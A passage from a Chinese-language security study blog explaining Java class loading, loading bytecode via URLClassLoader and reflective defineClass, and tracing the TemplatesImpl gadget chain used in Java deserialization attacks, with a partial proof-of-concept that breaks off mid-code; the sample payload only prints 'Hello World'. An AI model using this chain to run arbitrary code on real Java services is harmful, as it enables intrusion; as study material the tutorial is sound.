<li><strong>准备（Preparation）：</strong> 在准备阶段，JVM 为类的静态变量（类变量）分配内存，并设置默认初始值。这些静态变量会在类加载完成后被初始化为指定的初始值。注意，实例变量在这个阶段并不会被赋予初值，它们会在对象实例化时进行初始化。</li>
<li><strong>解析（Resolution）：</strong> 在解析阶段，JVM 将符号引用替换为直接引用。符号引用是一种在字节码中使用的符号来表示目标类或方法的引用，而直接引用是指向目标的真实指针或句柄。解析过程将符号引用转换为直接引用，以便在后续的执行中能够直接定位目标类或方法。</li>
</ul>
</li>
<li><strong>初始化（Initialization）：</strong> 初始化是类加载的最后一个阶段，在这个阶段，JVM 执行类的初始化代码，为静态变量赋予正确的初始值，并执行类中定义的静态初始化块。类的初始化是在类加载的最后阶段进行的，只有在真正使用类时才会触发初始化，例如创建类的实例、调用类的静态方法、访问类的静态变量等。初始化阶段可以包括复杂的逻辑和代码，这取决于类的定义和开发人员编写的初始化代码。</li>
</ol>
<h1 id="四、动态加载字节码"><a href="#四、动态加载字节码" class="headerlink" title="四、动态加载字节码"></a>四、动态加载字节码</h1><p>上面我们对classloader进行了学习，然后这里我们正式开始学习java如何动态加载字节码</p>
<h2 id="URLClassLoader加载远程class文件"><a href="#URLClassLoader加载远程class文件" class="headerlink" title="URLClassLoader加载远程class文件"></a>URLClassLoader加载远程class文件</h2><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731165428773.png"
                      alt="image-20230731165428773"
                ></p>
<p>可以看到URLclassloader是继承 SecureClassLoader类的</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731165439886.png"
                      alt="image-20230731165439886"
                ></p>
<p>而这里的 SecureClassLoader是继承了CLassloader类的，而且这个URLclassloader是我们上面介绍的应用程序加载器(appclassloader)的父类</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731165933112.png"
                      alt="image-20230731165933112"
                ></p>
<p>我们在上面双亲委派机制中说过，会先父类查询父类是否加载，直到引导下型加载器都未加载，开始从引导型加载器开始搜索类进行加载，引导型没有找到，子类进行查找加载，直到自定义加载器。</p>
<p>但是这个搜索是怎么搜索的呢?</p>
<p><strong>以下内容引自P神java安全漫谈</strong></p>
<p>正常情况下，Java会根据配置项 <code>sun.boot.class.path</code> 和 <code>java.class.path</code> 中列举到的基础路径（这<br>些路径是经过处理后的 <code>java.net.URL</code> 类）来寻找<code>.class</code>文件来加载，而这个基础路径有分为三种情况：</p>
<ul>
<li>URL未以斜杠 <code>/</code>结尾，则认为是一个JAR文件，使用 JarLoader 来寻找类，即为在Jar包中寻找.class文件</li>
<li>URL以斜杠 <code>/</code> 结尾，且协议名是 file ，则使用 FileLoader 来寻找类，即为在本地文件系统中寻找.class文件</li>
<li>URL以斜杠 <code>/</code>结尾，且协议名不是 file ，则使用最基础的 Loader 来寻找类</li>
</ul>
<p>我们这里通过http协议进行测试：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import java.net.URL;</span><br><span class="line">import java.net.URLClassLoader;</span><br><span class="line">public class HelloClassLoader &#123;</span><br><span class="line">    public static void main( String[] args ) throws Exception</span><br><span class="line">    &#123;</span><br><span class="line">        URL[] urls = &#123;new URL(&quot;http://localhost:8000/&quot;)&#125;;</span><br><span class="line">        URLClassLoader loader = URLClassLoader.newInstance(urls);</span><br><span class="line">        Class c = loader.loadClass(&quot;Hello&quot;);</span><br><span class="line">        c.newInstance();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>编译一个class文件放在服务器所在目录</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public class Hello &#123;</span><br><span class="line">    static&#123;</span><br><span class="line">        System.out.println(&quot;Hello,world&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>我这里之间在class文件所在开一个服务</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731171312206.png"
                      alt="image-20230731171312206"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731171405819.png"
                      alt="image-20230731171405819"
                ></p>
<p>可以看到成功加载到远程服务器上面的class文件，并执行了字节码输出了我们定义的helloworld</p>
<h2 id="ClassLoader-defineClass-加载字节码"><a href="#ClassLoader-defineClass-加载字节码" class="headerlink" title="ClassLoader#defineClass() 加载字节码"></a>ClassLoader#defineClass() 加载字节码</h2><p>我们这里在回顾一下双亲委派的实现代码</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Class&lt;?&gt; c = findLoadedClass(name);</span><br><span class="line">         if (c == null) &#123;                                                //双亲委派</span><br><span class="line">             long t0 = System.nanoTime();</span><br><span class="line">             try &#123;</span><br><span class="line">                 if (parent != null) &#123;</span><br><span class="line">                     c = parent.loadClass(name, false);</span><br><span class="line">                 &#125; else &#123;</span><br><span class="line">                     c = findBootstrapClassOrNull(name);</span><br><span class="line">                 &#125;</span><br><span class="line">             &#125; catch (ClassNotFoundException e) &#123;</span><br><span class="line">                 // ClassNotFoundException thrown if class not found</span><br><span class="line">                 // from the non-null parent class loader</span><br><span class="line">             &#125;</span><br><span class="line"></span><br><span class="line">             if (c == null) &#123;</span><br><span class="line">                 // If still not found, then invoke findClass in order</span><br><span class="line">                 // to find the class.</span><br><span class="line">                 long t1 = System.nanoTime();</span><br><span class="line">                 c = findClass(name);</span><br><span class="line"></span><br><span class="line">                 // this is the defining class loader; record the stats</span><br><span class="line">                 sun.misc.PerfCounter.getParentDelegationTime().addTime(t1 - t0);</span><br><span class="line">                 sun.misc.PerfCounter.getFindClassTime().addElapsedTimeFrom(t1);</span><br><span class="line">                 sun.misc.PerfCounter.getFindClasses().increment();</span><br><span class="line">             &#125;</span><br></pre></td></tr></table></figure></div>

<p>我们在双亲委派中学习了，在加载一个类时首先会先调用<code>findLoadedClass(name)</code>方法检查是否已经加载了对应名称的类，如果未加载会调用父类加载器通过loadclass来加载类</p>
<p>直到顶层加载器都不能加载成功，子类加载器会开始搜索类进行加载，这里使用的就是findclass(name)方法来查找加载类（类似我们上面的URLClassLoader），如果子类也不能加载继续调用子类加载器，直到调用到自定义加载器。当加载到类后会调用defineclass方法，并将字节码的字节数组、类名等信息传递给该方法。<code>defineClass</code> 方法会在 JVM 中将这些字节码转换为一个 Java 类的 <code>Class</code> 类，并将其加入到类加载器的类命名空间中。</p>
<p>其实前面两个loadclass和findclass都是在查找加载类，而defineclass才是真正的核心。</p>
<p>也就是说define将加载的字节码转换为一个java类。</p>
<p>那么根据上面的分析，不论是加载什么class文件都会经历这三个方法的调用：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CLassloader#CLassloader#loadclass======&gt; CLassloader#CLassloader#findclass(name)========&gt;CLassloader#dCLassloader#efineclass</span><br></pre></td></tr></table></figure></div>

<p>我们这里看一下clasLoader类中的defineclass方法：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">protected final Class&lt;?&gt; defineClass(String name, byte[] b, int off, int len)</span><br><span class="line">      throws ClassFormatError</span><br><span class="line">  &#123;</span><br><span class="line">      return defineClass(name, b, off, len, null);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure></div>

<p>可以看到defineclass是一个受保护的方法，我们不能够直接调用，所以我们如果要外部调用的话，这里要通过反射来获取这个defineclass方法。</p>
<p>接收三个参数，一个字符方法名，一个字节数组，一个偏移量一个长度</p>
<p>示例代码：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">import java.lang.reflect.Method;</span><br><span class="line">import java.util.Base64;</span><br><span class="line"></span><br><span class="line">public class HelloDefineClass &#123;</span><br><span class="line">    public static void main(String[] args) throws Exception &#123;</span><br><span class="line">        Method defineClass = ClassLoader.class.getDeclaredMethod(&quot;defineClass&quot;, String.class, byte[].class, int.class, int.class);</span><br><span class="line">        defineClass.setAccessible(true);</span><br><span class="line">        byte[] code = Base64.getDecoder().decode(&quot;yv66vgAAADQAGwoABgANCQAOAA8IABAKABEAEgcAEwcAFAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwABwAIBwAVDAAWABcBAAtIZWxsbyBXb3JsZAcAGAwAGQAaAQAFSGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAABAAEABwAIAAEACQAAAC0AAgABAAAADSq3AAGyAAISA7YABLEAAAABAAoAAAAOAAMAAAACAAQABAAMAAUAAQALAAAAAgAM&quot;);</span><br><span class="line">                        Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), &quot;Hello&quot;, code, 0, code.length);</span><br><span class="line">                        hello.newInstance();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>这里的code就是字节码</p>
<p>ClassLoader.getSystemClassLoader()获取系统类加载器实例，返回一个classloader对象</p>
<p>然后调用sefineclass方法对字节码进行处理转换为java类</p>
<p>运行结果：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731180256672.png"
                      alt="image-20230731180256672"
                ></p>
<p>这里要注意的是defineclass被调用的时候，类对象不会被初始化，只有显式调用构造函数，初始化代码才会被执行，而且即使我们的代码放到类的静态代码块中也无法直接被调用到，如果我们要使用 defineClass 在目标机器上执行任意代码，需要想办法调用构造函数。</p>
<h2 id="利用TemplatesImpl加载字节码"><a href="#利用TemplatesImpl加载字节码" class="headerlink" title="利用TemplatesImpl加载字节码"></a>利用TemplatesImpl加载字节码</h2><p>上面我们分析了defindclass加载字节码，但是我们defineclass这个方法是受保护的方法，不能够直接被调用，所以这里我们不能够直接调用。</p>
<p>那么我们要想使用这个方法执行任意代码就要向上找调用：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731181531200.png"
                      alt="image-20230731181531200"
                ></p>
<p>虽然大多数开发者不会直接使用defineclass方法，但是在java的一些底层方法中还是有调用了defineclass的</p>
<p>我们这里利用的是<code>TemplatesImp</code>l</p>
<p>在<code>TemplatesImp</code>l的TransletClassLoader类中重写了defineclass方法</p>
<p>跟进到</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">static final class TransletClassLoader extends ClassLoader &#123;</span><br><span class="line">    private final Map&lt;String,Class&gt; _loadedExternalExtensionFunctions;</span><br><span class="line"></span><br><span class="line">     TransletClassLoader(ClassLoader parent) &#123;</span><br><span class="line">         super(parent);</span><br><span class="line">        _loadedExternalExtensionFunctions = null;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    TransletClassLoader(ClassLoader parent,Map&lt;String, Class&gt; mapEF) &#123;</span><br><span class="line">        super(parent);</span><br><span class="line">        _loadedExternalExtensionFunctions = mapEF;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public Class&lt;?&gt; loadClass(String name) throws ClassNotFoundException &#123;</span><br><span class="line">        Class&lt;?&gt; ret = null;</span><br><span class="line">        // The _loadedExternalExtensionFunctions will be empty when the</span><br><span class="line">        // SecurityManager is not set and the FSP is turned off</span><br><span class="line">        if (_loadedExternalExtensionFunctions != null) &#123;</span><br><span class="line">            ret = _loadedExternalExtensionFunctions.get(name);</span><br><span class="line">        &#125;</span><br><span class="line">        if (ret == null) &#123;</span><br><span class="line">            ret = super.loadClass(name);</span><br><span class="line">        &#125;</span><br><span class="line">        return ret;</span><br><span class="line">     &#125;</span><br><span class="line"></span><br><span class="line">    /**</span><br><span class="line">     * Access to final protected superclass member from outer class.</span><br><span class="line">     */</span><br><span class="line">    Class defineClass(final byte[] b) &#123;</span><br><span class="line">        return defineClass(null, b, 0, b.length);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>而且这里并没有显式的声明其定义域。在java中如果一个方法没有显式的声明作用域，那么其作用域为default。那么这里的defineclass方法就由父类的protected变成了一个default类型的方法。</p>
<p>那么我们就要在<code>TemplatesImp</code>l中看一下哪里调用了defineclass</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731183014046.png"
                      alt="image-20230731183014046"
                ></p>
<p>根据查找用法我们可以在defineTransletClasses()中找到调用</p>
<p>但是这个是一个私有方法，不能直接调用，继续向上找调用：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731183214197.png"
                      alt="image-20230731183214197"
                ></p>
<p>getTransletInstance()同样是一个私有方法，继续向上找调用：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731183356861.png"
                      alt="image-20230731183356861"
                ></p>
<p>在newTransformer中可以找到对getTransletInstance()的调用，而且newTransformer是一个公有方法，那么我们这里外部可以直接调用，那么利用链就到这里结束了。</p>
<p>这里给出利用链：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#newTransformer() -&gt;</span><br><span class="line">TemplatesImpl#getTransletInstance() -&gt; </span><br><span class="line">TemplatesImpl#defineTransletClasses()-&gt; </span><br><span class="line">TransletClassLoader#defineClass()</span><br></pre></td></tr></table></figure></div>

<p>但是这只是利用链，我们要想要利用这条链，就要解决细节部分，写出POC实现利用：<br>我们继续回到newTransformer()的getTransletInstance()</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">transformer = new TransformerImpl(getTransletInstance(), _outputProperties,</span><br><span class="line">          _indentNumber, _tfactory);</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731184214068.png"
                      alt="image-20230731184214068"
                ></p>
<p>根据代码我们可以看到当<code>_name</code>不为空，<code>_class</code>为空时才能够调用defineTransletClasses()方法</p>
<p>但是默认情况下这两个参数都为空</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731184353198.png"
                      alt="image-20230731184353198"
                ></p>
<p>所以我们这里想要调用defineTransletClasses()方法就要修改_name不为空</p>
<p>然后我们在类中可以找到它的构造器:</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">public TemplatesImpl() &#123; &#125;</span><br></pre></td></tr></table></figure></div>

<p>那么我们这里就可以通过反射去修改属性值：</p>
<p>即：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">        Field field = obj.getClass().getDeclaredField(fieldName);//获取class对象后获取定名称 fieldName 的属性的 Field 对象</span><br><span class="line">        field.setAccessible(true);//设置 Field 对象的 accessible 属性为 true使我们可以修改属性值</span><br><span class="line">        field.set(obj,value);//修改值</span><br></pre></td></tr></table></figure></div>

<p>这里由于要修改的很多，所以我们这里直接定义一个方法来简化我们的代码：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception&#123;</span><br><span class="line">        Field field = obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        field.setAccessible(true);</span><br><span class="line">        field.set(obj,value);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></div>

<p>那么我们的POC为：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"></span><br><span class="line">import javax.xml.transform.Templates;</span><br><span class="line">import java.lang.reflect.Field;</span><br><span class="line"></span><br><span class="line">public class ces &#123;</span><br><span class="line">    public static void main(String[] args) throws Exception &#123;</span><br><span class="line">        Templates templates=new TemplatesImpl();</span><br><span class="line">        setFieldValue(templates,&quot;_name&quot;,&quot;111&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception&#123;</span><br><span class="line">        Field filed = obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        filed.setAccessible(true);</span><br><span class="line">        filed.set(obj, value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>继续跟进到defineTransletClasses()：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731190017497.png"
                      alt="image-20230731190017497"
                ></p>
<p>我们这里先看一下我们要调用的defineClass()方法：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">try &#123;</span><br><span class="line">            final int classCount = _bytecodes.length;</span><br><span class="line">            _class = new Class[classCount];</span><br><span class="line"></span><br><span class="line">            if (classCount &gt; 1) &#123;</span><br><span class="line">                _auxClasses = new HashMap&lt;&gt;();</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            for (int i = 0; i &lt; classCount; i++) &#123;</span><br><span class="line">                _class[i] = loader.defineClass(_bytecodes[i]);</span><br><span class="line">                final Class superClass = _class[i].getSuperclass();</span><br><span class="line"></span><br><span class="line">                // Check if this is the main class</span><br><span class="line">                if (superClass.getName().equals(ABSTRACT_TRANSLET)) &#123;</span><br><span class="line">                    _transletIndex = i;</span><br><span class="line">                &#125;</span><br><span class="line">                else &#123;</span><br><span class="line">                    _auxClasses.put(_class[i].getName(), _class[i]);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure></div>

<p>我们在调用<code>defineclass</code>方法时还传入了一个字节数组<code>_bytecodes[i]</code></p>
<p>那么结合前面这里这个字节数组就是我们要传入的字节码</p>
<p>那么其实这个就是实现了遍历字节数组取出当中的字节码，然后传入defineclass进行处理</p>
<p>但是我们不可能调用<code>defineTransletClasses()</code>就能够直接调用到<code>defineClass</code></p>
<p>我们这里分析一下上面的代码逻辑：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if (_bytecodes == null) &#123;</span><br><span class="line">    ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);</span><br><span class="line">    throw new TransformerConfigurationException(err.toString());</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>首先一个是对<code>_bytecodes</code>判断是否为空，这里的<code>_bytecodes</code>其实就是我们的字节码数组，那么我们这里把我们的字节码赋值给<code>_bytecodes</code>就可以使其不为空</p>
<p>我们这里还是通过反射去修改属性值：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Field filed = templates.getClass().getDeclaredField(&quot;_bytecodes&quot;);</span><br><span class="line">filed.setAccessible(true);</span><br><span class="line">filed.set(templates, &quot;字节码&quot;);</span><br></pre></td></tr></table></figure></div>

<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">TransletClassLoader loader = (TransletClassLoader)</span><br><span class="line">    AccessController.doPrivileged(new PrivilegedAction() &#123;</span><br><span class="line">        public Object run() &#123;</span><br><span class="line">            return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br></pre></td></tr></table></figure></div>

<p>或者是直接加载远程或者本地class文件：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">byte[] code = Files.readAllBytes(Paths.get(&quot;E:\\Coding\\Java\\CC\\target\\classes\\EvilTemplatesImpl.class&quot;));</span><br><span class="line">       byte[][] codes = &#123;code&#125;;</span><br><span class="line">       setFieldValue(obj, &quot;_bytecodes&quot;, new byte[][] &#123;code&#125;);</span><br></pre></td></tr></table></figure></div>



<p>其实效果都是一样的。</p>
<p>然后是一个run方法</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">TransletClassLoader loader = (TransletClassLoader)</span><br><span class="line">    AccessController.doPrivileged(new PrivilegedAction() &#123;</span><br><span class="line">        public Object run() &#123;</span><br><span class="line">            return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br></pre></td></tr></table></figure></div>

<p>这里有一个<code>_tfactory</code>，因为用到了这个参数所以我们要给这个参数赋值，不然这里就会报错</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802171846688.png"
                      alt="image-20230802171846688"
                ></p>
<p><code>transient</code> 关键字是 Java 中的一个修饰符，用于标记变量，表示该变量在对象的序列化过程中不会被持久化，即不会被写入到字节流中，从而在反序列化后该变量的值会被重新初始化。</p>
<p>所以说我们这里给这个参数去赋值时没有意义的，因为当他在被反序列化的时候又被重新初始化了。<br>那我们直接跟进到readobject中去看一下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802172251738.png"
                      alt="image-20230802172251738"
                ></p>
<p>可以看到在反序列化的时候是会给这个参数赋值的</p>
<p>但是我们这里要使用这个参数</p>
<p>所以我们这里可以通过反射随便给它赋值，因为无论我们赋什么值，这里在反序列化的时候的值是不会改变的</p>
<p>然后我们这里为了方便直接赋值<code>new TransformerFactoryImpl</code>，方便我们后面调试，因为我们利用链到这里还不会进行反序列化，所以我们这里先赋值给它。</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Field filed = templates.getClass().getDeclaredField(&quot;_tfactory&quot;);</span><br><span class="line">filed.setAccessible(true);</span><br><span class="line">filed.set(templates, &quot;new TransformerFactoryImpl&quot;);</span><br></pre></td></tr></table></figure></div>

<p>然后我们这里为了简化代码，直接把反射修改属性值这一部分代码定义一个函数：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception&#123;</span><br><span class="line">    Field filed = obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">    filed.setAccessible(true);</span><br><span class="line">    filed.set(obj, value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>那么到这里我们的POC可以编写为：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"></span><br><span class="line">import javax.xml.transform.Templates;</span><br><span class="line">import java.lang.reflect.Field;</span><br><span class="line"></span><br><span class="line">public class cc3 &#123;</span><br><span class="line">    public static void main(String[] args) throws Exception &#123;</span><br><span class="line">        Templates templates = new TemplatesImpl();</span><br><span class="line">        byte[] bytes = Base64.getDecoder().decode(&quot;字节码base64编码&quot;);</span><br><span class="line">        setFieldValue(templates,&quot;_name&quot;,&quot;111&quot;);</span><br><span class="line">        setFieldValue(templates,&quot;_bytecodes&quot;,new byte[][]&#123;bytes&#125;);</span><br><span class="line">        setFieldValue(templates,&quot;_tfactory&quot;,new TransformerFactoryImpl());</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span 